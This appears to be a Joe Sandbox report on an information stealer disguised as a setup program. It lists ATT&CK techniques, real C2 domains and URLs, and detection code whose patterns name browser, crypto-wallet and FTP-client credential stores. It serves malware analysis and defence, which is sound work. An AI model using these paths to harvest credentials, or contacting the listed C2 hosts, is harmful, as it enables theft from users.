Source: Yara match, File source: 00000000.00000003.1860274897.0000000000BD4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: Process Memory Space: Active_Setup.exe PID: 7532, type: MEMORYSTR
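The file and directory accesses above are the host-side fingerprint of this stealer: one process reading Chrome profile data, several wallet stores and FTP-client configuration in a single pass, none of which a setup program has any business touching. The following is an added detection example, not part of the Joe Sandbox report: it classifies file-access events by the path patterns taken from the entries above and flags any process that reads data it does not own across more than one category. The event record format, the owner-process allowlist (chrome.exe, exodus.exe and the rest) and the sample events are constructed assumptions; the stealer's own accesses and its PID 7532 are lifted from the report.

```python
"""Detection logic for the stealer file-access pattern seen above.

Added example, not part of the Joe Sandbox report. The path patterns are
taken from the report's "File opened" entries; the event record format, the
owner-process allowlist and SAMPLE_EVENTS are constructed for illustration.
"""
import re
from collections import defaultdict
from typing import Dict, FrozenSet, List, NamedTuple, Optional, Tuple


class Event(NamedTuple):
    process: str
    pid: int
    path: str


class Alert(NamedTuple):
    process: str
    pid: int
    categories: FrozenSet[str]
    paths: Tuple[str, ...]


# Regexes over the accessed path, grouped by what the data is worth to a
# stealer. Each pattern starts at a backslash and must end the path or be
# followed by another path component, so "Binance" does not match "Binance2".
CATEGORIES = {
    "browser": re.compile(
        r"\\Google\\Chrome\\User Data\\[^\\]+\\(?:Web Data|Local Extension Settings)(?=$|\\)", re.I),
    "wallet": re.compile(
        r"\\(?:Exodus\\exodus\.wallet|Ledger Live|atomic\\Local Storage\\leveldb|"
        r"Coinomi\\Coinomi\\wallets|Bitcoin\\wallets|Binance|com\.liberty\.jaxx\\IndexedDB|"
        r"Electrum(?:-LTC)?\\wallets|Guarda\\IndexedDB)(?=$|\\)", re.I),
    "ftp_client": re.compile(
        r"\\(?:FTPGetter|FTPInfo|SmartFTP\\Client 2\.0\\Favorites|FTPbox|FTPRush|"
        r"SiteDesigner\\3D-FTP)(?=$|\\)", re.I),
}

# Processes that legitimately own each category. Assumption: these names are
# illustrative and must be tuned to the software actually installed.
OWNERS: Dict[str, FrozenSet[str]] = {
    "browser": frozenset({"chrome.exe"}),
    "wallet": frozenset({"exodus.exe", "electrum.exe", "bitcoin-qt.exe"}),
    "ftp_client": frozenset({"smartftp.exe", "ftprush.exe"}),
}


def classify(path: str) -> Optional[str]:
    """Return the data category a path belongs to, or None if uninteresting."""
    for name, pattern in CATEGORIES.items():
        if pattern.search(path):
            return name
    return None


def detect(events: List[Event], min_categories: int = 2) -> List[Alert]:
    """Flag processes that read sensitive stores they do not own.

    A single non-owner process touching at least `min_categories` distinct
    categories is the stealer signature; the default of 2 keeps a backup tool
    that reads one wallet directory out of the alert list.
    """
    touched: Dict[Tuple[str, int], Dict[str, set]] = defaultdict(lambda: defaultdict(set))
    for ev in events:
        category = classify(ev.path)
        if category is None or ev.process.lower() in OWNERS[category]:
            continue
        touched[(ev.process, ev.pid)][category].add(ev.path)

    alerts = []
    for (process, pid), by_category in touched.items():
        if len(by_category) >= min_categories:
            paths = tuple(sorted(p for ps in by_category.values() for p in ps))
            alerts.append(Alert(process, pid, frozenset(by_category), paths))
    return alerts


# Constructed file-access events: the Active_Setup.exe accesses mirror the
# report (PID 7532 is the sample's PID there); the rest is benign noise.
SAMPLE_EVENTS = [
    Event("chrome.exe", 4120, r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data"),
    Event("Active_Setup.exe", 7532, r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data"),
    Event("Active_Setup.exe", 7532,
          r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef"),
    Event("Active_Setup.exe", 7532, r"C:\Users\user\AppData\Roaming\Exodus\exodus.wallet"),
    Event("Active_Setup.exe", 7532, r"C:\Users\user\AppData\Roaming\Electrum\wallets"),
    Event("Active_Setup.exe", 7532, r"C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites"),
    Event("Active_Setup.exe", 7532, r"C:\Users\user\Documents\LTKMYBSEYZ"),
    Event("notepad.exe", 5100, r"C:\Users\user\AppData\Roaming\Electrum\wallets"),
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(f"{alert.process} (PID {alert.pid}) read {sorted(alert.categories)}:")
        for p in alert.paths:
            print("   ", p)
```

Run over the constructed events, only Active_Setup.exe is reported: chrome.exe owns the Chrome profile, and notepad.exe touches a single category, which stays below the threshold. Feeding the same logic from Sysmon Event ID 11 or an EDR file-read stream replaces the constructed list.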

Remote Access Functionality

Source: Yara match, File source: Process Memory Space: Active_Setup.exe PID: 7532, type: MEMORYSTR
Source: Yara match, File source: sslproxydump.pcap, type: PCAP
Source: Yara match, File source: decrypted.memstr, type: MEMORYSTR
Source: C:\Users\user\Desktop\Active_Setup.exe Code function: 0_2_00FC30D0 _memset,_memset,_strncmp,_strncmp,htons,bind,bind,htons,htons,bind,_memset,getsockname,WSAGetLastError,WSAGetLastError, 0_2_00FC30D0
MITRE ATT&CK matrix, listed per tactic. A number in parentheses is the signature count shown next to that technique; techniques without a number have no matching signature.
Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
Execution: Windows Management Instrumentation (12); Command and Scripting Interpreter (12); Native API (12); PowerShell (2); Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Privilege Escalation: Process Injection (1); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Defense Evasion: Virtualization/Sandbox Evasion (221); Process Injection (1); Deobfuscate/Decode Files or Information (11); Obfuscated Files or Information (3); DLL Side-Loading (1); Steganography; Compile After Delivery; Indicator Removal from Tools
Credential Access: OS Credential Dumping (2); LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
Discovery: System Time Discovery (2); Query Registry (1); Security Software Discovery (241); Virtualization/Sandbox Evasion (221); Process Discovery (2); Application Window Discovery (1); File and Directory Discovery (12); System Information Discovery (34)
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
Collection: Archive Collected Data (1); Data from Local System (41); Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
Command and Control: Encrypted Channel (11); Ingress Tool Transfer (2); Non-Application Layer Protocol (3); Application Layer Protocol (114); Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement

Source | Detection | Scanner | Label
Active_Setup.exe | 18% | ReversingLabs | Win32.Trojan.Generic
No Antivirus matches
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label
cryofficesj.click | 0% | Avira URL Cloud | safe
https://cegu.shop/ | 100% | Avira URL Cloud | malware
https://klipvumisui.shop/int_clp_sha.txtn8J | 100% | Avira URL Cloud | malware
https://cryofficesj.click/api | 0% | Avira URL Cloud | safe
https://dfgh.online | 100% | Avira URL Cloud | malware
https://cryofficesj.click/s | 0% | Avira URL Cloud | safe
https://klipvumisui.shop/ | 100% | Avira URL Cloud | malware
https://dfgh.online/invoker.php?compname= | 100% | Avira URL Cloud | malware
https://cryofficesj.click/apij | 0% | Avira URL Cloud | safe
https://dfgh.online/ | 100% | Avira URL Cloud | malware
https://cryofficesj.click/apipXQ | 0% | Avira URL Cloud | safe
https://dfgh.online/invoker.php?compName=user-PC | 100% | Avira URL Cloud | malware
https://cryofficesj.click/api_ | 0% | Avira URL Cloud | safe
https://cryofficesj.click/ | 0% | Avira URL Cloud | safe
https://dfgh.online/invoker.php?compName=user-PCt | 100% | Avira URL Cloud | malware
https://klipvumisui.shop/int_clp_sha.txtG3 | 100% | Avira URL Cloud | malware
Name | IP | Active | Malicious | Antivirus Detection | Reputation
cegu.shop | 185.161.251.21 | true | false | - | high
cryofficesj.click | 188.114.97.3 | true | true | - | unknown
klipvumisui.shop | 104.21.37.128 | true | false | - | high
dfgh.online | unknown | unknown | false | - | high
Name | Malicious | Antivirus Detection | Reputation
cryofficesj.click | true | Avira URL Cloud: safe | unknown
https://cryofficesj.click/api | true | Avira URL Cloud: safe | unknown
rabidcowse.shop | false | - | high
wholersorie.shop | false | - | high
cloudewahsj.shop | false | - | high
noisycuttej.shop | false | - | high
nearycrepso.shop | false | - | high
https://cegu.shop/8574262446/ph.txt | false | - | high
framekgirus.shop | false | - | high
tirepublicerj.shop | false | - | high
abruptyopsn.shop | false | - | high
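Two caveats follow from the domain tables above before any of it is turned into a blocklist. First, Avira URL Cloud rates cryofficesj.click and its /api endpoint "safe" while the report marks them malicious, so the indicator list has to come from the extracted C2 configuration and contacted-domain tables, not from third-party reputation alone. Second, 188.114.97.3 and 104.21.37.128 are Cloudflare edge addresses shared with unrelated sites, so matching must be done on host names rather than IPs. The following is an added example, not part of the Joe Sandbox report: it scans proxy-log lines for the C2 domains and URL paths listed in the report, suffix-matching on label boundaries so a look-alike such as notcegu.shop does not fire. The log line format and the sample log are constructed assumptions; the domains and paths are the report's.

```python
"""Match proxy-log traffic against the C2 infrastructure from the report.

Added example, not part of the Joe Sandbox report. The domains and URL paths
below are copied from the report's configuration and contacted-URL tables; the
log format and SAMPLE_PROXY_LOG are constructed for illustration.
"""
from typing import Iterable, List, NamedTuple, Optional
from urllib.parse import urlsplit

# C2 domains from the malware configuration and contacted-domain tables.
C2_DOMAINS = frozenset({
    "cryofficesj.click", "cegu.shop", "klipvumisui.shop", "dfgh.online",
    "rabidcowse.shop", "wholersorie.shop", "cloudewahsj.shop", "noisycuttej.shop",
    "nearycrepso.shop", "framekgirus.shop", "tirepublicerj.shop", "abruptyopsn.shop",
})

# URL paths the sample requested on those domains. A hit on domain *and* path
# is high confidence; domain alone is medium (it may be DNS prefetch, a
# sinkhole visit or an analyst's browser).
C2_PATH_PREFIXES = ("/api", "/int_clp_sha.txt", "/invoker.php", "/8574262446/ph.txt")


class Hit(NamedTuple):
    line_no: int
    client: str
    host: str
    ioc: str
    confidence: str


def matched_domain(host: str) -> Optional[str]:
    """Return the IOC domain that `host` equals or is a subdomain of.

    Suffix matching is done on label boundaries so that notcegu.shop does not
    match cegu.shop.
    """
    host = host.lower().rstrip(".")
    for domain in C2_DOMAINS:
        if host == domain or host.endswith("." + domain):
            return domain
    return None


def scan_proxy_log(lines: Iterable[str]) -> List[Hit]:
    """Scan 'timestamp client method url status' lines and return IOC hits."""
    hits: List[Hit] = []
    for line_no, line in enumerate(lines, start=1):
        fields = line.split()
        if len(fields) < 4:
            continue  # malformed or blank line: skip rather than crash
        _timestamp, client, _method, url = fields[:4]
        parts = urlsplit(url)
        host = parts.hostname or ""
        ioc = matched_domain(host)
        if ioc is None:
            continue
        confidence = "high" if parts.path.startswith(C2_PATH_PREFIXES) else "medium"
        hits.append(Hit(line_no, client, host, ioc, confidence))
    return hits


# Constructed proxy log: the first four lines replay the sample's own requests
# from the report, the rest is benign traffic plus a look-alike domain.
SAMPLE_PROXY_LOG = [
    "2024-12-31T10:00:01Z 10.0.0.5 POST https://cryofficesj.click/api 200",
    "2024-12-31T10:00:03Z 10.0.0.5 GET https://cegu.shop/8574262446/ph.txt 200",
    "2024-12-31T10:00:04Z 10.0.0.5 GET https://klipvumisui.shop/int_clp_sha.txt 200",
    "2024-12-31T10:00:05Z 10.0.0.5 GET https://dfgh.online/invoker.php?compName=user-PC 200",
    "2024-12-31T10:00:09Z 10.0.0.7 GET https://www.google.com/ 200",
    "2024-12-31T10:00:10Z 10.0.0.7 GET https://cdn.abruptyopsn.shop/x 200",
    "2024-12-31T10:00:11Z 10.0.0.9 GET https://notcegu.shop/ 200",
]

if __name__ == "__main__":
    for hit in scan_proxy_log(SAMPLE_PROXY_LOG):
        print(f"line {hit.line_no}: {hit.client} -> {hit.host} ({hit.ioc}, {hit.confidence})")
```

On the constructed log the four replayed requests come back as high-confidence hits for client 10.0.0.5, the cdn.abruptyopsn.shop request is a medium-confidence domain hit, and the look-alike notcegu.shop does not match.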
Name | Source | Malicious | Antivirus Detection | Reputation
https://duckduckgo.com/chrome_newtab | Active_Setup.exe, 00000000.00000003.1790143337.0000000003ADC000.00000004.00000800.00020000.00000000.sdmp, Active_Setup.exe, 00000000.00000003.1790243068.0000000003ADA000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://duckduckgo.com/ac/?q= | Active_Setup.exe, 00000000.00000003.1790143337.0000000003ADC000.00000004.00000800.00020000.00000000.sdmp, Active_Setup.exe, 00000000.00000003.1790243068.0000000003ADA000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://contoso.com/License | powershell.exe, 00000004.00000002.1943309782.0000000005BBC000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://cegu.shop/ | Active_Setup.exe, 00000000.00000002.1934142517.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, Active_Setup.exe, 00000000.00000003.1928822586.0000000000B77000.00000004.00000020.00020000.00000000.sdmp, Active_Setup.exe, 00000000.00000003.1933387895.0000000000BBF000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://dfgh.online/invoker.php?compName= | powershell.exe, 00000004.00000002.1940996495.0000000004F1A000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | Active_Setup.exe, 00000000.00000003.1790143337.0000000003ADC000.00000004.00000800.00020000.00000000.sdmp, Active_Setup.exe, 00000000.00000003.1790243068.0000000003ADA000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17 | Active_Setup.exe, 00000000.00000003.1802226156.0000000003AE8000.00000004.00000800.00020000.00000000.sdmp, Active_Setup.exe, 00000000.00000003.1790698899.0000000003AE8000.00000004.00000800.00020000.00000000.sdmp, Active_Setup.exe, 00000000.00000003.1790589203.0000000003AEF000.00000004.00000800.00020000.00000000.sdmp, Active_Setup.exe, 00000000.00000003.1802125356.0000000003AE8000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://www.openssl.org/support/faq.html | Active_Setup.exe | false | - | high
https://aka.ms/pscore6lB | powershell.exe, 00000004.00000002.1940996495.0000000004B51000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://x1.c.lencr.org/0 | Active_Setup.exe, 00000000.00000003.1812503861.0000000003ACB000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://x1.i.lencr.org/0 | Active_Setup.exe, 00000000.00000003.1812503861.0000000003ACB000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install | Active_Setup.exe, 00000000.00000003.1790698899.0000000003AC3000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | Active_Setup.exe, 00000000.00000003.1790143337.0000000003ADC000.00000004.00000800.00020000.00000000.sdmp, Active_Setup.exe, 00000000.00000003.1790243068.0000000003ADA000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://contoso.com/ | powershell.exe, 00000004.00000002.1943309782.0000000005BBC000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://nuget.org/nuget.exe | powershell.exe, 00000004.00000002.1943309782.0000000005BBC000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://dfgh.online | powershell.exe, 00000004.00000002.1940996495.0000000004CA6000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
https://dfgh.online/invoker.php?compname= | powershell.exe, 00000004.00000002.1944197772.0000000007101000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://support.mozilla.org/products/firefoxgro.all | Active_Setup.exe, 00000000.00000003.1816838527.0000000003BBE000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000004.00000002.1940996495.0000000004B51000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://klipvumisui.shop/int_clp_sha.txt | Active_Setup.exe, 00000000.00000003.1928822586.0000000000B77000.00000004.00000020.00020000.00000000.sdmp | false | - | high
http://nuget.org/NuGet.exe | powershell.exe, 00000004.00000002.1943309782.0000000005BBC000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | Active_Setup.exe, 00000000.00000003.1790143337.0000000003ADC000.00000004.00000800.00020000.00000000.sdmp, Active_Setup.exe, 00000000.00000003.1790243068.0000000003ADA000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000004.00000002.1940996495.0000000004CA6000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000004.00000002.1940996495.0000000004CA6000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://go.micro | powershell.exe, 00000004.00000002.1940996495.0000000004FFA000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://cryofficesj.click/s | Active_Setup.exe, 00000000.00000003.1877831557.0000000000BF5000.00000004.00000020.00020000.00000000.sdmp, Active_Setup.exe, 00000000.00000003.1881263103.0000000000BF5000.00000004.00000020.00020000.00000000.sdmp, Active_Setup.exe, 00000000.00000003.1860274897.0000000000BF5000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://curl.haxx.se/docs/http-cookies.html# | Active_Setup.exe | false | - | high
https://contoso.com/Icon | powershell.exe, 00000004.00000002.1943309782.0000000005BBC000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | Active_Setup.exe, 00000000.00000003.1790143337.0000000003ADC000.00000004.00000800.00020000.00000000.sdmp, Active_Setup.exe, 00000000.00000003.1790243068.0000000003ADA000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://crl.rootca1.amazontrust.com/rootca1.crl0 | Active_Setup.exe, 00000000.00000003.1812503861.0000000003ACB000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://www.microsoft. | powershell.exe, 00000004.00000002.1944489969.000000000729F000.00000004.00000020.00020000.00000000.sdmp | false | - | high
http://ocsp.rootca1.amazontrust.com0: | Active_Setup.exe, 00000000.00000003.1812503861.0000000003ACB000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://klipvumisui.shop/int_clp_sha.txtn8J | Active_Setup.exe, 00000000.00000002.1935352330.0000000003A93000.00000004.00000800.00020000.00000000.sdmp, Active_Setup.exe, 00000000.00000003.1933101445.0000000003A93000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016 | Active_Setup.exe, 00000000.00000003.1802226156.0000000003AE8000.00000004.00000800.00020000.00000000.sdmp, Active_Setup.exe, 00000000.00000003.1790698899.0000000003AE8000.00000004.00000800.00020000.00000000.sdmp, Active_Setup.exe, 00000000.00000003.1790589203.0000000003AEF000.00000004.00000800.00020000.00000000.sdmp, Active_Setup.exe, 00000000.00000003.1802125356.0000000003AE8000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://www.ecosia.org/newtab/ | Active_Setup.exe, 00000000.00000003.1790143337.0000000003ADC000.00000004.00000800.00020000.00000000.sdmp, Active_Setup.exe, 00000000.00000003.1790243068.0000000003ADA000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br | Active_Setup.exe, 00000000.00000003.1816838527.0000000003BBE000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://github.com/Pester/Pester | powershell.exe, 00000004.00000002.1940996495.0000000004CA6000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://curl.haxx.se/docs/http-cookies.html | Active_Setup.exe | false | - | high
https://klipvumisui.shop/ | Active_Setup.exe, 00000000.00000002.1934226305.0000000000BF5000.00000004.00000020.00020000.00000000.sdmp, Active_Setup.exe, 00000000.00000002.1935352330.0000000003A93000.00000004.00000800.00020000.00000000.sdmp, Active_Setup.exe, 00000000.00000003.1933101445.0000000003A93000.00000004.00000800.00020000.00000000.sdmp, Active_Setup.exe, 00000000.00000003.1933666444.0000000000BF5000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://ac.ecosia.org/autocomplete?q= | Active_Setup.exe, 00000000.00000003.1790143337.0000000003ADC000.00000004.00000800.00020000.00000000.sdmp, Active_Setup.exe, 00000000.00000003.1790243068.0000000003ADA000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://dfgh.online/ | powershell.exe, 00000004.00000002.1940316473.0000000002CEE000.00000004.00000020.00020000.00000000.sdmp | true
                                                                                                            • Avira URL Cloud: malware
                                                                                                            unknown
                                                                                                            https://cryofficesj.click/apijActive_Setup.exe, 00000000.00000003.1887755366.0000000000BDB000.00000004.00000020.00020000.00000000.sdmp, Active_Setup.exe, 00000000.00000003.1888154365.0000000000BDB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            unknown
                                                                                                            https://cryofficesj.click/apipXQActive_Setup.exe, 00000000.00000003.1877780850.0000000003A9E000.00000004.00000800.00020000.00000000.sdmp, Active_Setup.exe, 00000000.00000002.1935389766.0000000003AA0000.00000004.00000800.00020000.00000000.sdmp, Active_Setup.exe, 00000000.00000003.1860459644.0000000003A9C000.00000004.00000800.00020000.00000000.sdmp, Active_Setup.exe, 00000000.00000003.1908939711.0000000003A9C000.00000004.00000800.00020000.00000000.sdmp, Active_Setup.exe, 00000000.00000003.1888096331.0000000003A9C000.00000004.00000800.00020000.00000000.sdmp, Active_Setup.exe, 00000000.00000003.1860424960.0000000003A92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            unknown
                                                                                                            http://www.openssl.org/support/faq.html....................Active_Setup.exefalse
                                                                                                              high
                                                                                                              https://dfgh.online/invoker.php?compName=user-PCpowershell.exe, 00000004.00000002.1940996495.0000000004CA6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              • Avira URL Cloud: malware
                                                                                                              unknown
                                                                                                              https://support.microsofActive_Setup.exe, 00000000.00000003.1790589203.0000000003AF1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://dfgh.online/invoker.php?compName=user-PCtpowershell.exe, 00000004.00000002.1940996495.0000000004CA6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: malware
                                                                                                                unknown
                                                                                                                http://crt.rootca1.amazontrust.com/rootca1.cer0?Active_Setup.exe, 00000000.00000003.1812503861.0000000003ACB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://cryofficesj.click/Active_Setup.exe, 00000000.00000003.1888154365.0000000000BF5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  unknown
                                                                                                                  https://klipvumisui.shop/int_clp_sha.txtG3Active_Setup.exe, 00000000.00000002.1935352330.0000000003A93000.00000004.00000800.00020000.00000000.sdmp, Active_Setup.exe, 00000000.00000003.1933101445.0000000003A93000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  • Avira URL Cloud: malware
                                                                                                                  unknown
                                                                                                                  https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ExamplesActive_Setup.exe, 00000000.00000003.1790698899.0000000003AC3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://cryofficesj.click/api_Active_Setup.exe, 00000000.00000003.1877831557.0000000000BDB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    unknown
                                                                                                                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=Active_Setup.exe, 00000000.00000003.1790143337.0000000003ADC000.00000004.00000800.00020000.00000000.sdmp, Active_Setup.exe, 00000000.00000003.1790243068.0000000003ADA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      high
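The URL rows above are strings carved from the listed process memory dumps (the `.sdmp` references), which is why one C2 path appears several times with different tails: `apij`, `apipXQ` and `api_` on cryofficesj.click, `int_clp_sha.txtn8J` and `int_clp_sha.txtG3` on klipvumisui.shop, `user-PC` and `user-PCt` on dfgh.online. That is what a string carver produces when a decrypted string is not NUL-terminated and the scan runs into neighbouring heap bytes. The Python below is an added example, not part of the Joe Sandbox report, showing how to carve URLs from a dump in both the 8-bit and the UTF-16LE form (PowerShell's .NET strings are wide, as the powershell.exe-sourced dfgh.online rows would be in memory) and how to collapse over-read variants back to a base path by clustering on their common prefix. The memory buffer is constructed to mimic the report's strings, and `carve_urls` and `cluster_variants` are hypothetical names; the merge rule is a heuristic, so the variants are kept alongside the base for the analyst to confirm.

```python
import re
from collections import defaultdict
from os.path import commonprefix
from urllib.parse import urlsplit

# Constructed buffer imitating a process memory dump (not a real dump).
# The 8-bit strings are deliberately not NUL-terminated, so a carver that
# keeps reading until the first non-printable byte picks up neighbouring
# bytes ("n8J", "pXQ") exactly as in the report's URL table. The PowerShell
# stage stores .NET strings as UTF-16LE, so that URL is embedded wide.
ANSI_PART = (
    b"\x00\x00https://klipvumisui.shop/int_clp_sha.txtn8J\x00"
    b"\x7f\x01https://klipvumisui.shop/int_clp_sha.txtG3\x00"
    b"GET https://cryofficesj.click/apipXQ\x00\xff"
    b"https://cryofficesj.click/apij\x00"
    b"https://cryofficesj.click/api_\x00"
    b"https://cryofficesj.click/\x00"
    b"https://klipvumisui.shop/\x00"
    b"http://www.openssl.org/support/faq.html\x00"
)
WIDE_PART = (
    "https://dfgh.online/invoker.php?compName=user-PCt".encode("utf-16-le") + b"\x00\x00"
    + "https://dfgh.online/invoker.php?compName=user-PC".encode("utf-16-le") + b"\x00\x00"
)
SAMPLE_DUMP = ANSI_PART + WIDE_PART

# Printable non-space ASCII is the widest net; anything else ends the string.
ANSI_URL = re.compile(rb"https?://[\x21-\x7e]+")
# Same alphabet, but every code unit is followed by a zero byte (UTF-16LE).
WIDE_URL = re.compile(rb"h\x00t\x00t\x00p\x00(?:s\x00)?:\x00/\x00/\x00(?:[\x21-\x7e]\x00)+")


def carve_urls(buf: bytes) -> list[str]:
    """Return every 8-bit and UTF-16LE URL-looking string in buf, in offset order."""
    found = []
    for m in ANSI_URL.finditer(buf):
        found.append((m.start(), m.group().decode("ascii")))
    for m in WIDE_URL.finditer(buf):
        found.append((m.start(), m.group().decode("utf-16-le")))
    found.sort()
    return [url for _, url in found]


def cluster_variants(urls: list[str]) -> dict[str, dict[str, list[str]]]:
    """Group carved URLs by host and merge paths that look like over-read
    variants of one another.

    Two paths merge when their common prefix reaches past the final '/' of
    both, i.e. they agree on at least the start of the last path segment; the
    cluster's base becomes that common prefix. A bare '/' therefore never
    absorbs '/api...', so a root beacon stays distinct from an API path.
    Heuristic: '/api1' and '/api2' would also merge into '/api', which is why
    every variant is returned with its base instead of being discarded.
    """
    by_host: dict[str, list[str]] = defaultdict(list)
    for url in urls:
        parts = urlsplit(url)
        path = parts.path or "/"
        if parts.query:
            path += "?" + parts.query
        by_host[parts.netloc.lower()].append(path)

    result: dict[str, dict[str, list[str]]] = {}
    for host, paths in by_host.items():
        clusters: list[tuple[str, list[str]]] = []  # (base, variants)
        for path in sorted(set(paths)):
            for i, (base, variants) in enumerate(clusters):
                prefix = commonprefix([base, path])
                if len(prefix) > max(base.rfind("/"), path.rfind("/")) + 1:
                    clusters[i] = (prefix, variants + [path])
                    break
            else:
                clusters.append((path, [path]))
        result[host] = {base: variants for base, variants in clusters}
    return result


if __name__ == "__main__":
    for host, clusters in cluster_variants(carve_urls(SAMPLE_DUMP)).items():
        for base, variants in clusters.items():
            print(f"{host}{base:<40} <- {variants}")
```

Run against a real dump, the base paths (here `/api`, `/int_clp_sha.txt`, `/invoker.php?compName=user-PC`) are what goes into a blocklist or a network signature; the raw variants are worth keeping in the case notes, because a repeat of the same junk tail across two samples means the same build, not a new path.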
| IP | Domain | Country | ASN | ASN Name | Malicious |
|---|---|---|---|---|---|
| 104.21.37.128 | klipvumisui.shop | United States | 13335 | CLOUDFLARENETUS | false |
| 188.114.97.3 | cryofficesj.click | European Union | 13335 | CLOUDFLARENETUS | true |
| 185.161.251.21 | cegu.shop | United Kingdom | 5089 | NTLGB | false |
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1582495
Start date and time: 2024-12-30 18:18:10 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 5m 20s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
